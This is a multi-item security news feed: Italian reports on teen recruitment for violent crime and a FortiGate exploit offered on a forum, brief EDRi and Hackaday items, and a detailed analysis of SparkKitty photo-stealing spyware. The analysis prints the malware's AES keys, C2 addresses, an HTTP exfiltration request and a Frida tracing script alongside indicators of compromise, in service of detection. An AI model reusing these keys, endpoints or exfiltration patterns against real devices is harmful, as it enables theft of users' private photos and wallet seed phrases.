In Europa sta prendendo piede una preoccupante tendenza criminale : bande criminali utilizzano app crittografate per reclutare adolescenti di appena 14 anni per commettere crimini violenti, tra cui omicidi su commissione.

Non si tratta di drammi polizieschi, ma di episodi reali in cui i giovani vengono coinvolti nel cosiddetto modello della “violenza come servizio“. Attraverso servizi di messaggistica sicura, i criminali offrono denaro per gli attacchi e i confini internazionali non sono più un ostacolo.

L’indagine, avviata dall’Autorità Nazionale Danese per i Reati Gravi con il supporto della polizia svedese, ha già portato ad arresti. Tra gli episodi chiave figura la sparatoria di Kokkedal del 7 maggio 2025. Sette persone di età compresa tra 14 e 26 anni sono state arrestate o si sono consegnate volontariamente alle autorità, tra cui residenti in Svezia e Marocco. Due diciottenni svedesi sono sospettati di reclutamento attivo: secondo gli inquirenti, avrebbero contribuito a organizzare i crimini e fornito armi e rifugi ai partecipanti.

In risposta alla minaccia, Europol ha attivato la task force internazionale OTF GRIMM, creata nell’aprile 2025. Ne fanno parte Danimarca, Svezia, Germania, Francia, Finlandia, Paesi Bassi e altri Paesi. L’obiettivo principale è quello di smascherare l’infrastruttura digitale attraverso cui vengono coordinati tali crimini.

Secondo il direttore del Centro europeo per la criminalità organizzata, le moderne reti criminali agiscono in modo pragmatico e cinico, delegando compiti pericolosi agli adolescenti e promettendo loro soldi facili.

Vale la pena notare che le applicazioni crittografate sono state a lungo utilizzate in altri schemi criminali. Ad esempio, nell’importante indagine internazionale sulla rete “764“, associata allo sfruttamento dei minori, anche i principali sospettati provenienti da Stati Uniti e Grecia hanno coordinato le loro azioni tramite messaggi anonimi.

Le autorità stanno intensificando le attività di prevenzione: vengono pubblicate raccomandazioni per genitori e insegnanti per aiutarli a individuare tempestivamente i segnali d’allarme. Cambiamenti improvvisi nel comportamento, la comparsa di oggetti costosi senza una causa apparente. Europol sottolinea che un intervento precoce può salvare gli adolescenti da un percorso pericoloso.

L’indagine è in corso. L’obiettivo è trovare gli organizzatori e chiudere i canali che trasformano le chat sicure in strumenti di influenza criminale.

L'articolo Omicidi come un drink! Il dark web recluta ragazzini con App crittografate in Europa proviene da il blog della sicurezza informatica.

In November 2023, EDRi and members filed a complaint against the French decree implementing the EU regulation addressing the dissemination of 'terrorist content' online. Last week, the French supreme administrative court rejected our arguments and refused to refer the case to the Court of Justice of the European Union.

The post French Administrative Supreme Court illegitimately buries the debate over internet censorship law appeared first on European Digital Rights (EDRi).

QR codes are something that we all take for granted in this day and age. There are even a million apps to create your own QR codes, but what if you want to make a barcode? How about making a specific kind of barcode that follows UPC-E, CODE 39, or even the infamous… CODABAR? Well, it might be more difficult to find a single app that can handle all those different standards. Using “yet-another-web-app”, Barcode Tool – Generator & Scanner, you can rid these worries, created by [Ricardo de Azambuja].

When going to [Ricardo]’s simple application, you will find a straightforward interface that allows you to make far more different strips and square patterns than you’ve ever imagined. Of course, starting with the common QR code, you can create custom overlaid codes like many other QR generators. More uniquely, there are options for any barcode under the sun to help organize your hacker workspace. If you don’t want to download an app to scan the codes, you can even use the included scanner function.

If you want to use the web app, you can find it here! In-depth solutions to rather simple problems are something we strive to provide here at Hackaday, and this project is no exception. However, if you want something more physical, check out this specialized outdoor city cooking station.

hackaday.com/2025/06/23/visual…

In January 2025, we uncovered the SparkCat spyware campaign, which was aimed at gaining access to victims’ crypto wallets. The threat actor distributed apps containing a malicious SDK/framework. This component would wait for a user to open a specific screen (typically a support chat), then request access to the device’s gallery. It would then use an OCR model to select and exfiltrate images of interest. Although SparkCat was capable of searching for any text within images, that campaign specifically targeted photos containing seed phrases for crypto wallets. The malware was distributed through unofficial sources as well as Google Play and App Store. Now, we’ve once again come across a new type of spyware that has managed to infiltrate the official app stores. We believe it is connected to SparkCat and also targets the cryptocurrency assets of its victims.

Here are the key facts about this new threat:

• The malware targets both iOS and Android devices, and it is spreading in the wild as well as through the App Store and Google Play.
• On iOS, the malicious payload is delivered as frameworks (primarily mimicking AFNetworking.framework or Alamofire.framework) or obfuscated libraries disguised as libswiftDarwin.dylib, or it can be embedded directly into the app itself.
• The Android-specific Trojan comes in both Java and Kotlin flavors; the Kotlin version is a malicious Xposed module.
• While most versions of this malware indiscriminately steal all images, we discovered a related malicious activity cluster that uses OCR to pick specific pictures.
• The campaign has been active since at least February 2024.

It all began with a suspicious online store…

During routine monitoring of suspicious links, we stumbled upon several similar-looking pages that were distributing TikTok mods for Android. In these modified versions, the app’s main activities would trigger additional code. The code would then request a Base64-encoded configuration file from hxxps://moabc[.]vip/?dev=az. A sample decoded configuration file is shown below.
{
"links": {
"shopCenter": "https://h1997.tiktokapp.club/wap/?",
"goodsList": "https://h1997.tiktokapp.club/www/?",
"orderList": "https://h1997.tiktokapp.club/www/?",
"reg": "https://www.baidu.com",
"footbar": "https://www.baidu.com"
}
}
The links from the configuration file were displayed as buttons within the app. Tapping these opened WebView, revealing an online store named TikToki Mall that accepted cryptocurrency as payment for consumer goods. Unfortunately, we couldn’t verify if it was a legitimate store, as users had to register with an invitation code to make a purchase.

Although we didn’t find any other suspicious functionality within the apps, a gut feeling told us to dig deeper. We decided to examine the code of the web pages distributing the apps, only to find a number of interesting details suggesting they might also be pushing iOS apps.
<div class="t-name">
<div class="tit">
{{if ext=="ipa"}}
<i class="iconfont icon-iphone" style="font-size:inherit;margin-right:5px"></i>
{{else}}
<i class="iconfont icon-android" style="font-size:inherit;margin-right:5px"></i>
{{/if}}

iOS app delivery method

And sure enough, visiting the website on an iPhone triggers a series of redirects, ultimately landing the user on a page that crudely mimics the App Store and prompts them to download an app.

iOS app download page

As you know, iOS doesn’t just let you download and run any app from a third-party source. However, Apple provides members of the Apple Developer Program with so-called provisioning profiles. These allow a developer certificate to be installed on a user device. iOS then uses this certificate to verify the app’s digital signature and determine if it can be launched. Besides the certificate, a provisioning profile contains its expiration date and the permissions to be granted to the app, as well as other information about the developer and the app. Once the profile is installed on a device, the certificate becomes trusted, allowing the app to run.

Provisioning profiles come in several types. Development profiles are used for testing apps and can only be distributed to a predefined set of devices. App Store Connect profiles allow for publishing an app to the App Store. Enterprise profiles were created to allow organizations to develop internal-use apps and install them on their employees’ devices without publishing them on the App Store and without any restrictions on which devices they can be installed on. Although the Apple Developer Program requires a paid membership and developer verification by Apple, Enterprise profiles are often exploited. They are used not only by developers of apps unsuitable for the App Store (online casinos, cracks, cheats, or illegal mods of popular apps) but also by malware creators.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AppIDName</key>
<string>rdcUniApp</string>
<key>ApplicationIdentifierPrefix</key>
<array>
<string>EHQ3N2D5WH</string>
</array>
<key>CreationDate</key>
<date>2025-01-20T06:59:55Z</date>
<key>Platform</key>
<array>
<string>iOS</string>
<string>xrOS</string>
<string>visionOS</string>
</array>
<key>IsXcodeManaged</key>
<false/>
<key>DeveloperCertificates</key>
<array>
<data>OMITTED</data>
</array>

<key>DER-Encoded-Profile</key>
<data>OMITTED</data>

<key>Entitlements</key>
<dict>

<key>application-identifier</key>
<string>EHQ3N2D5WH.com.ss-tpc.rd.rdcUniApp</string>

<key>keychain-access-groups</key>
<array>
<string>EHQ3N2D5WH.*</string>
<string>com.apple.token</string>
</array>

<key>get-task-allow</key>
<false/>

<key>com.apple.developer.team-identifier</key>
<string>EHQ3N2D5WH</string>

</dict>
<key>ExpirationDate</key>
<date>2026-01-20T06:59:55Z</date>
<key>Name</key>
<string>syf</string>
<key>ProvisionsAllDevices</key>
<true/>
<key>TeamIdentifier</key>
<array>
<string>EHQ3N2D5WH</string>
</array>
<key>TeamName</key>
<string>SINOPEC SABIC Tianjin Petrochemical Co. Ltd.</string>
<key>TimeToLive</key>
<integer>365</integer>
<key>UUID</key>
<string>55b65f87-9102-4cb9-934a-342dd2be8e25</string>
<key>Version</key>
<integer>1</integer>
</dict>
</plist>

Example of a provisioning profile installed to run a malicious TikTok mod
In the case of the malicious TikTok mods, the attackers used an Enterprise profile, as indicated by the following key in its body:
<key>ProvisionsAllDevices</key>
<true/>
It’s worth noting that installing any provisioning profile requires direct user interaction, which looks like this:

Profile installation flow

Looking for copper, found gold

Just like its Android counterpart, the installed iOS app contained a library that embedded links to a suspicious store within the user’s profile window. Tapping these opened them in WebView.

Suspicious store opened inside a TikTok app

It seemed like a straightforward case: another mod of a popular app trying to make some money. However, one strange detail in the iOS version caught our attention. On every launch, the app requested access to the user’s photo gallery – highly unusual behavior for the original TikTok. Furthermore, the library containing the store didn’t have code accessing the photo gallery, and the Android version never requested image permissions. We were compelled to dig a little deeper and examine the app’s other dependencies. This led to the discovery of a malicious module pretending to be AFNetworking.framework. For a touch of foreshadowing, let’s spotlight a curious detail: certain apps referred to it as Alamofire.framework, but the code itself stayed exactly the same. The original version of AFNetworking is an open-source library that provides developers with a set of interfaces for convenient network operations.

The malicious version differs from the original by a modified AFImageDownloader class and an added AFImageDownloaderTool class. Interestingly, the authors didn’t create separate initialization functions or alter the library’s exported symbols to launch the malicious payload. Instead, they took advantage of a feature in Objective-C that allows classes to define a special load selector, which is automatically called when the app is loading. In this case, the entry point for the malicious payload was the +[AFImageDownloader load] selector, which does not exist in the original framework.

Malicious class entry point

The malicious payload functions as follows:

1. It checks if the value of the ccool key in the app’s main Info.plist configuration file matches the string 77e1a4d360e17fdbc. If the two differ, the malicious payload will not proceed.
2. It retrieves the Base64-encoded value of the ccc key from the framework’s Info.plist file. This value is decoded and then decrypted using AES-256 in ECB mode with the key p0^tWut=pswHL-x>>:m?^.^)W padded with nulls to reach a length of 32 bytes. Some samples were also observed using the key J9^tMnt=ptfHL-x>>:m!^.^)A. If there’s no ccc key in the configuration or the key’s value is empty, the malware attempts to use the key com.tt.cf to retrieve an encrypted string from UserDefaults – a database where the app can store information for use in subsequent launches.
3. The decrypted value is a list of URLs from which the malware fetches additional payloads, encrypted using the same method. This new ciphertext contains a set of C2 addresses used for exfiltrating stolen photos.
4. The final step before uploading the photos is to receive authorization from the C2 server. To do this, the malware sends a GET request to the /api/getImageStatus endpoint, transmitting app details and the user’s UUID. The server responds with the following JSON:{"msg":"success","code":0,"status":"1"}The code field tells the app whether to repeat the request after a delay, with 0 meaning no, and the status field indicates whether it has permission to upload the photos.
5. Next, the malware requests access to the user’s photo gallery. It then registers a callback function to monitor for any changes within the gallery. The malware exfiltrates any accessible photos that have not already been uploaded. To keep track of which photos have been stolen, it creates a local database. If the gallery is modified while the app is running, the malware will attempt to access and upload the new images to the C2 server.

Photo exfiltration and upload

Data transmission is performed directly within the selector [AFImageDownloader receiptID:andPicID:] by making a PUT request to the /api/putImages endpoint. In addition to the image itself, information about the app and the device, along with unique user identifiers, is also sent to the server.
PUT /api/putImages HTTP/1.1
Host: 23.249.28.88:7777
Content-Type: multipart/form-data; boundary=Boundary+C9D8BE3781515E01
Connection: keep-alive
Accept: */*
User-Agent: TikTok/31.4.0 (iPhone; iOS 14.8; Scale/3.00)
Accept-Language: en-US;q=1, ja-US;q=0.9, ar-US;q=0.8, ru-US;q=0.7
Content-Length: 80089
Accept-Encoding: gzip, deflate
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="appname"
TikTok
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="buid"
com.zhiliaoapp.musically
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="device"
ios
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="userId"
xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="uuid"
xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/Lx/xxx
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="image"; filename="<name>"
Content-Type: image/jpeg
......JFIF.....H.H.....LExif..MM.*...................i.........&.................e.......... ........8Photoshop 3.0.8BIM........8BIM.%................ ...B~...4ICC_PROFILE......$appl....mntrRGB XYZ .......

Digging deeper

When we found a spyware component in the modified iOS version of TikTok, we immediately wondered if the Trojan had an Android counterpart. Our initial search led us to a bunch of cryptocurrency apps. These apps had malicious code embedded in their entry points. It requests a configuration file with C2 addresses and then decrypts it using AES-256 in ECB mode. These decrypted addresses are then used by the Trojan to send a GET request to /api/anheartbeat. The request includes information about the infected app. The Trojan expects a JSON response. If the code field is 0, it means communication with that C2 is allowed. The status flag in the JSON determines whether the Trojan can send the victim’s images to the server.

Checking C2 addresses

The main functionality of this malware – stealing images from the gallery – works in two stages. First, the malware checks the status flag. If it’s set to allow file uploads, the Trojan then checks the contents of a file named aray/cache/devices/.DEVICES on external storage. The first time it runs, the Trojan writes a hexadecimal number to this file. The number is an MD5 hash of a string containing the infected device’s IMEI, MAC address, and a random UUID. The content of this file is then compared to the string B0B5C3215E6D. If the content is different, the Trojan uploads images from the gallery, along with infected device info, to the command server via a PUT request to /api/putDataInfo. If the content is the same, it only uploads the third image from the end of an alphabetically sorted list. It’s highly likely the attackers use this specific functionality for debugging their malicious code.

Uploading image and device information

Later, we discovered other versions of this Trojan embedded in casino apps. These were loaded using the LSPosed framework, which is designed for app code hooking. Essentially, these Trojan versions acted as malicious Xposed modules. They would hook app entry points and execute code similar to the malware we described earlier, but with a few interesting twists:

1. The C2 address storage was located in both the module’s resources and directly within the malware code. Typically, these were two different addresses, and both were used to obtain C2 information.

Procedure for obtaining C2 addresses

1. Among the decrypted C2 addresses, the Trojan picks the one corresponding to the fastest server. It does this by sending a request to each server sequentially. If the request is successful, it records the response time. The shortest time then determines which C2 server is used. Note that this algorithm could have been implemented without needing to store intermediate values.

Finding the shortest response time

1. The code uses custom names for classes, methods, and fields.
2. It is written in Kotlin. Other versions we found were written in Java.

Spyware in official app stores

One of the Android Java apps containing a malicious payload was a messaging app with crypto exchange features. This app was uploaded to Google Play and installed over 10,000 times. It was still available in the store at the time of this research. We notified Google about it.

Infected app on Google Play

Another infected Android app we discovered is named 币coin and distributed through unofficial sources. However, it also has an iOS version. We found it on the App Store and alerted Apple to the presence of the infected app in their store.

Infected app page on the App Store

In both the Android and iOS versions, the malicious payload was part of the app itself, not of a third-party SDK or framework. In the iOS version, the central AppDelegate class, which manages the app’s lifecycle, registers its selector [AppDelegate requestSuccess:] as a handler for responses returned by requests sent to i.bicoin[.]com[.]cn.

Checking the server response and sending a photo

{
code = 0;
data = {
27 = (
);
50002 = (
{
appVersion = "";
cTime = 1696304011000;
id = 491;
imgSubTitle = "";
imgTitle = "\U70ed\U5f00\U5173\Uff08\U65b0\Uff09";
imgType = 50002;
imgUrl = 0;
imgUrlSub = "";
isFullScreen = 0;
isNeed = 1;
isSkip = 1;
langType = all;
operator = 0;
skipUrl = "";
sort = 10000;
source = 0;
type = 0;
uTime = <timestamp>;
}
);
};
dialog = {
cancelAndClose = 0;
cancelBtn = "";
cancelColor = "";
code = 0;
confirmBtn = "";
confirmColor = "";
content = "";
contentColor = "";
time = "";
title = OK;
titleColor = "";
type = 3;
url = "";
};Sample server response
In the response, the imgUrl field contains information about the permission to send photos (1 means granted). Once the Trojan gets the green light, it uses a similar method to what we described earlier: it downloads an encrypted set of C2 addresses and tries sending the images to one of them. By default, it’ll hit the first address on the list. If that one’s down, the malware just moves on to the next. The photo-sending functionality is implemented within the KYDeviceActionManager class.

Retrieving and sending photos

Suspicious libcrypto.dylib mod

During our investigation, we also stumbled upon samples that contained another suspicious library: a modified version of OpenSSL’s cryptographic primitives library, libcrypto.dylib. It showed up under names like wc.dylib and libswiftDarwin.dylib, had initialization functions that were obfuscated with LLVM, and contained a link to a configuration we’d seen before in other malicious frameworks. It also imported the PHPhotoLibrary class, used for gallery access in the files we mentioned earlier. Sometimes the library was delivered alongside the malicious AFNetworking.framework/Alamofire.framework, sometimes not.

Unlike other variants of this malware, this particular library didn’t actually reach out to the malicious configuration file link embedded within it. That meant we had to manually dig for the code responsible for its initial communication with the C2. Even though these library samples are heavily obfuscated, some of them, like the sample with the hash c5be3ae482d25c6537e08c888a742832, still had cross-references to the part of the code where the encrypted configuration page URL was used. This function converted a URL string into an NSString object.

Section of obfuscated code for loading the malicious URL

Using Frida, we can execute any piece of code as a function, but simply converting a string to an NSString object isn’t enough to confirm the library’s malicious intent. So, we followed the cross-references up several levels. When we tried to execute the function that worked with the URL during its execution, we discovered it was making a GET request to the malicious URL. However, we couldn’t get a response right away; the server the URL pointed to was already inactive. To make the function run correctly, we used Frida to substitute the link with a working one, where we knew exactly what data it returned and how it was decrypted. By setting logging hooks on the objc_msgSend call and running the malicious function with a swapped URL, we got the info we needed about the calls. Below is the Frida script we used to do this:
function traceModule(impl, name)
{
console.log("Tracing " + name, impl);
var exit_log = 0;
Interceptor.attach(impl, {
onEnter: function(args) {
var bt = Thread.backtrace(this.context, Backtracer.ACCURATE);
if (!moduleMap) {
moduleMap = new ModuleMap();
}
var modules = bt.map(x => moduleMap.find(x)).filter(x => x != null).map(x => x.name);
// we want to trace only calls originating from malware dylib
if (modules.filter(x => x.includes('wc.dylib')).length > 0) {
exit_log = 1;
console.warn("\n*** entering " + name);
if(name.includes('objc_msgSend')) {
var sel = this.context.x1.readUtf8String();
if (sel.includes("stringWithCString:")) {
var s = this.context.x2.readUtf8String();
if (s.includes('.cn-bj.ufileos.com')) {
console.log("Replacing URL: ", s);
var news = Memory.allocUtf8String('https://data-sdk2.oss-accelerate.aliyuncs.com/file/SGTMnH951121');
this.context.x2 = news;
console.log("New URL: ", this.context.x2.readUtf8String());
}
else
console.log(s);
}
}

//print backtrace
console.log(bt.map(DebugSymbol.fromAddress).join("\n"));
}

},
onLeave: function(retval) {
if (exit_log == 1) {
console.warn("\n***extiting ", name);
console.log(this.context.x0.readByteArray(64));
}
}
});
}

var malInited = false;
var malFunc;
function callMalware() {
if (!malInited) {
malFunc = new NativeFunction(base.add(0x7A77CC), 'void', []);
traceModule(base.add(0x821360), 'objc_msgSend');
malInited = true;
}
malFunc();
}

var mname = "wc.dylib";
var base = Process.enumerateModules().filter(x=>x.name.includes(mname))[0].base;
console.log('Base address: ', base);
malFunc();
Our suspicions were confirmed: the malicious function indeed loads and decrypts the C2 address configuration from a given URL. It then uses this C2 for sending device data, following the same pattern we described earlier and using the same AES-256 key. Below is an excerpt from the function’s execution logs.
*** entering objc_msgSend
### Creating NSString object with decrypted string
[ 0x20193a010 stringWithCString:"http://84.17.37.155:8081" encoding: ]
0x102781be8 wc.dylib!0x7d1be8 (0x7d1be8)
0x1027590e8 wc.dylib!0x7a90e8 (0x7a90e8)

*** entering objc_msgSend
### Creating NSString with api endpoint decrypted somewhere in code
[ 0x20193a010 stringWithCString:"%@/api/getStatus?buid=%@&appname=%@&userId=%@" encoding: ]
0x10277cc50 wc.dylib!0x7ccc50 (0x7ccc50)
0x102783264 wc.dylib!0x7d3264 (0x7d3264)

### Here sample initiates HTTP request to decrypted C2 address and decrypts its response ###

*** entering objc_msgSend
### Getting server response as data object
[ 0x2022d5078 initWithData:encoding: ]
0x10277f4a4 wc.dylib!0x7cf4a4 (0x7cf4a4)
0x1afafcac4 CFNetwork!0x1dac4 (0x180a6cac4)

*** leaving objc_msgSend
### Server response in bytes

00000000 41 e9 92 01 a2 21 00 00 8c 07 00 00 01 00 00 00 A....!..........
00000010 2e 7b 22 6d 73 67 22 3a 22 73 75 63 63 65 73 73 .{"msg":"success
00000020 22 2c 22 63 6f 64 65 22 3a 30 2c 22 75 73 22 3a ","code":0,"us":
00000030 31 2c 22 73 74 61 74 75 73 22 3a 22 30 22 7d 00 1,"status":"0"}.
The function execution log above clearly shows it uses an IP address from the encrypted configuration file. Device data is sent to this IP’s /api/getStatus endpoint with arguments familiar from previous samples. We also see that the server’s response contains the code and status fields we’ve encountered before. All of this strongly suggests that this library is also involved in stealing user photos. The only thing we haven’t pinpointed yet is the exact conditions under which this malicious function activates. At startup, the library contacts a C2 whose address in encrypted within it, sending device information and expecting a JSON string response from the server. At the time of this research, we hadn’t found any samples with an active C2 address, so we don’t know the precise response it’s looking for. However, we assume that response – or subsequent responses – should contain the permission to start sending photos.

Another activity cluster?

During our research, we stumbled upon a significant number of pages offering for download various scam iOS apps in the PWA (progressive web app) format. At first glance, these pages seemed unrelated to the campaign we describe in this article. However, their code bore a striking resemblance to the pages distributing the malicious TikTok version, which prompted us to investigate how users were landing on them. While digging into the traffic sources, we uncovered ads for various scams and Ponzi schemes on popular platforms.

Scam platform account on YouTube

Some of these PWA-containing pages also included a section prompting users to download a mobile app. For Android users, the link downloaded an APK file that opened the scam platform via WebView.

App download links

Beyond just opening scam websites in WebView, these downloaded APKs had another function. The apps requested access to read storage. Once this was granted, they used the Loader API to register their content download event handler. This handler then selected all JPEG and PNG images. The images were processed using the Google ML Kit library designed for optical character recognition. ML Kit searched for text blocks and then broke them down into lines. If at least three lines containing a word with a minimum of three letters were found, the Trojan would send the image to the attackers’ server – its address was retrieved from Amazon AWS storage.

Code snippet for photo uploads

We’re moderately confident that this activity cluster is connected to the one described above. Here’s why:

1. The malicious apps also focus on cryptocurrency themes.
2. Similar tactics are employed: the C2 address is also hosted in cloud storage, and gallery content is exfiltrated.
3. The pages distributing iOS PWAs look similar to those used to download malicious TikTok mods.

Given this connection between the two activity clusters, we suspect the creators of the apps mentioned earlier might also be spreading them through social media ads.

Campaign goals and targets

Unlike SparkCat, the spyware we analyzed above doesn’t show direct signs of the attackers being interested in victims’ crypto assets. However, we still believe they’re stealing photos with that exact goal in mind. The following details lead us to these conclusions:

1. A crypto-only store was embedded within the TikTok app alongside the spyware.
2. Among the apps where the spyware was found, several were crypto-themed. For instance, 币coin in the App Store positions itself as a crypto information tracker, and the SOEX messaging app has various crypto-related features as well.
3. The main source for distributing the spyware is a network of cookie-cutter app download platforms. During our investigation, we found a significant number of domains that distributed both the described Trojan and PWAs (progressive web apps). Users were directed to these PWAs from various cryptocurrency scam and Ponzi scheme sites.

Our data suggests that the attackers primarily targeted users in Southeast Asia and China. Most of the infected apps we discovered were various Chinese gambling games, TikTok, and adult games. All these apps were originally aimed specifically at users in the regions mentioned above.
Furthermore, we believe this malware is linked to the SparkCat campaign, and here’s our reasoning:

• Some Android apps infected with SparkKitty were built with the same framework as the apps infected with SparkCat.
• In both campaigns, we found the same infected Android apps.
• Within the malicious iOS frameworks, we found debug symbols. They included file paths from the attackers’ systems, which pointed to where their projects were being built. These paths match what we previously observed in SparkCat.

Takeaways

Threat actors are still actively compromising official app stores, and not just for Android – iOS is also a target. The espionage campaign we uncovered uses various distribution methods: it spreads through apps infected with malicious frameworks/SDKs from unofficial sources, as well as through malicious apps directly on the App Store and Google Play. While not technically or conceptually complex, this campaign has been ongoing since at least the beginning of 2024 and poses a significant threat to users. Unlike the previously discovered SparkCat spyware, this malware isn’t picky about which photos it steals from the gallery. Although we suspect the attackers’ main goal is to find screenshots of crypto wallet seed phrases, other sensitive data could also be present in the stolen images.

Judging by the distribution sources, this spyware primarily targets users in Southeast Asia and China. However, it doesn’t have any technical limitations that would prevent it from attacking users in other regions.

Our security products return the following verdicts when detecting malware associated with this campaign:

• HEUR:Trojan-Spy.AndroidOS.SparkKitty.*
• HEUR:Trojan-Spy.IphoneOS.SparkKitty.*

Indicators of compromise

Infected Android apps

b4489cb4fac743246f29abf7f605dd15
e8b60bf5af2d5cc5c501b87d04b8a6c2
aa5ce6fed4f9d888cbf8d6d8d0cda07f
3734e845657c37ee849618e2b4476bf4
fa0e99bac48bc60aa0ae82bc0fd1698d
e9f7d9bc988e7569f999f0028b359720
a44cbed18dc5d7fff11406cc403224b9
2dc565c067e60a1a9656b9a5765db11d
66434dd4402dfe7dda81f834c4b70a82
d851b19b5b587f202795e10b72ced6e1
ce49a90c0a098e8737e266471d323626
cc919d4bbd3fb2098d1aeb516f356cca
530a5aa62fdcca7a8b4f60048450da70
0993bae47c6fb3e885f34cb9316717a3
5e15b25f07020a5314f0068b474fff3d
1346f987f6aa1db5e6deb59af8e5744a

Infected iOS apps

21ef7a14fee3f64576f5780a637c57d1
6d39cd8421591fbb0cc2a0bce4d0357d
c6a7568134622007de026d22257502d5
307a64e335065c00c19e94c1f0a896f2
fe0868c4f40cbb42eb58af121570e64d
f9ab4769b63a571107f2709b5b14e2bc
2b43b8c757c872a19a30dcdcff45e4d8
0aa1f8f36980f3dfe8884f1c6f5d6ddc
a4cca2431aa35bb68581a4e848804598
e5186be781f870377b6542b3cecfb622
2d2b25279ef9365420acec120b98b3b4
149785056bf16a9c6964c0ea4217b42b
931399987a261df91b21856940479634

Malicious iOS frameworks

8c9a93e829cba8c4607a7265e6988646
b3085cd623b57fd6561e964d6fd73413
44bc648d1c10bc88f9b6ad78d3e3f967
0d7ed6df0e0cd9b5b38712d17857c824
b0eda03d7e4265fe280360397c042494
fd4558a9b629b5abe65a649b57bef20c
1b85522b964b38de67c5d2b670bb30b1
ec068e0fc6ffda97685237d8ab8a0f56
f10a4fdffc884089ae93b0372ff9d5d1
3388b5ea9997328eb48977ab351ca8de
931085b04c0b6e23185025b69563d2ce
7e6324efc3acdb423f8e3b50edd5c5e5
8cfc8081559008585b4e4a23cd4e1a7f

Obfuscated malicious iOS libraries

0b7891114d3b322ee863e4eef94d8523
0d09c4f956bb734586cee85887ed5407
2accfc13aaf4fa389149c0a03ce0ee4b
5b2e4ea7ab929c766c9c7359995cdde0
5e47604058722dae03f329a2e6693485
9aeaf9a485a60dc3de0b26b060bc8218
21a257e3b51561e5ff20005ca8f0da65
0752edcf5fd61b0e4a1e01371ba605fd
489217cca81823af56d141c985bb9b2c
b0976d46970314532bc118f522bb8a6f
f0460bdca0f04d3bd4fc59d73b52233b
f0815908bafd88d71db660723b65fba4
6fe6885b8f6606b25178822d7894ac35

Download links for infected apps

hxxps://lt.laoqianf14[.]top/KJnn
hxxps://lt.laoqianf15[.]top/KJnn
hxxps://lt.laoqianf51[.]top/KJnn
hxxps://yjhjymfjnj.wyxbmh[.]cn/2kzos8?a45dd02ac=d4f42319a78b6605cabb5696bacb4677
hxxps://xt.xinqianf38[.]top/RnZr

Pages distributing Trojans

hxxps://accgngrid[.]com
hxxps://byteepic[.]vip

C2 and configuration storage

C2:
23.249.28[.]88
120.79.8[.]107
23.249.28[.]200
47.119.171[.]161
api.fxsdk.com

Configurations
hxxp://120.78.239[.]17:10011/req.txt
hxxp://39.108.186[.]119:10011/req.txt
hxxps://dhoss-2023.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://sdk-data-re.oss-accelerate.aliyuncs[.]com/JMUCe7txrHnxBr5nj.txt
hxxps://gitee[.]com/bbffipa/data-group/raw/master/02WBUfZTUvxrTMGjh7Uh
hxxps://ok2025-oss.oss-cn-shenzhen.aliyuncs[.]com/ip/FM4J7aWKeF8yK
hxxps://file-ht-2023.oss-cn-shenzhen.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://afwfiwjef-mgsdl-2023.oss-cn-shanghai.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://zx-afjweiofwe.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://dxifjew2.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
hxxps://sdk-data-re.oss-accelerate.aliyuncs[.]com/JMUCe7txrHnxBr5nj.txt
hxxps://data-sdk2.oss-accelerate.aliyuncs[.]com/file/SGTMnH951121
hxxps://1111333[.]cn-bj.ufileos[.]com/file/SGTMnH951121
hxxps://tbetter-oss.oss-accelerate.aliyuncs[.]com/ip/CF4J7aWKeF8yKVKu
hxxps://photo-php-all.s3[.]ap-southeast-1.amazonaws[.]com/app/domain.json
hxxps://c1mon-oss.oss-cn-hongkong.aliyuncs[.]com/J2A3SWc2YASfQ2
hxxps://tbetter-oss.oss-cn-guangzhou.aliyuncs[.]com/ip/JZ24J7aYCeNGyKVF2
hxxps://data-sdk.oss-accelerate.aliyuncs[.]com/file/SGTMnH951121

Paths

/sdcard/aray/cache/devices/.DEVICES

securelist.com/sparkkitty-ios-…

Un nuovo e allarmante sviluppo sta scuotendo il panorama della sicurezza informatica: un attore malevolo ha pubblicizzato sul dark web un exploit altamente sofisticato volto a compromettere dispositivi FortiGate.

Si tratta di un nuovo exploit venduto al prezzo di 12.000 dollari per firewall FortiGate che è apparso in vendita sul noto forum underground Exploit. Il post, pubblicato da un utente con lo pseudonimo Anon-WMG, presenta uno strumento capace di compromettere in modo massivo dispositivi Fortinet sfruttando le API esposte.

Caratteristiche tecniche dell’exploit

Denominato “FortiGate API Dump Exploit (~7.2 e versioni inferiori)”, il tool è in grado di interagire con oltre 170 endpoint delle API FortiGate, con compatibilità dichiarata per le versioni 6.x e 5.x, e testato anche su 7.2.6 e precedenti. Le funzionalità includono:

• Dump automatico da più di 170 endpoint API Fortinet
• Estrazione di informazioni sensibili: configurazioni firewall, utenti VPN locali, portali SSL, backup, chiavi SNMP, parametri DNS, HA e NTP
• Supporto al multithreading (oltre 20 thread) per scansioni rapide e massicce
• Output in formato JSON e file di configurazione strutturati
• Headers stealth e modulo di reporting dedicato (“Report Runner”)

Lo strumento prende di mira:

• Firewall FortiGate con API esposte (porte predefinite: 443 e 10443)
• Portali SSL/VPN configurati in modo errato

L’autore sostiene che l’exploit sia in grado di compromettere:

• Credenziali di rete interne e amministrative (inclusi hash e password cifrate)
• Token attivi SAML/RADIUS/LDAP
• Token VPN e ID di sessioni IPSec
• Backup completi di configurazione dei dispositivi

Impatto e diffusione e prezzo di vendita

Le implicazioni sono gravi e includono:

• Accesso alla rete interna e lateral movement
• Furto di configurazioni, backup e credenziali
• Compromissione di comunicazioni VPN in corso
• Possibilità di escalation attraverso token utente legittimi

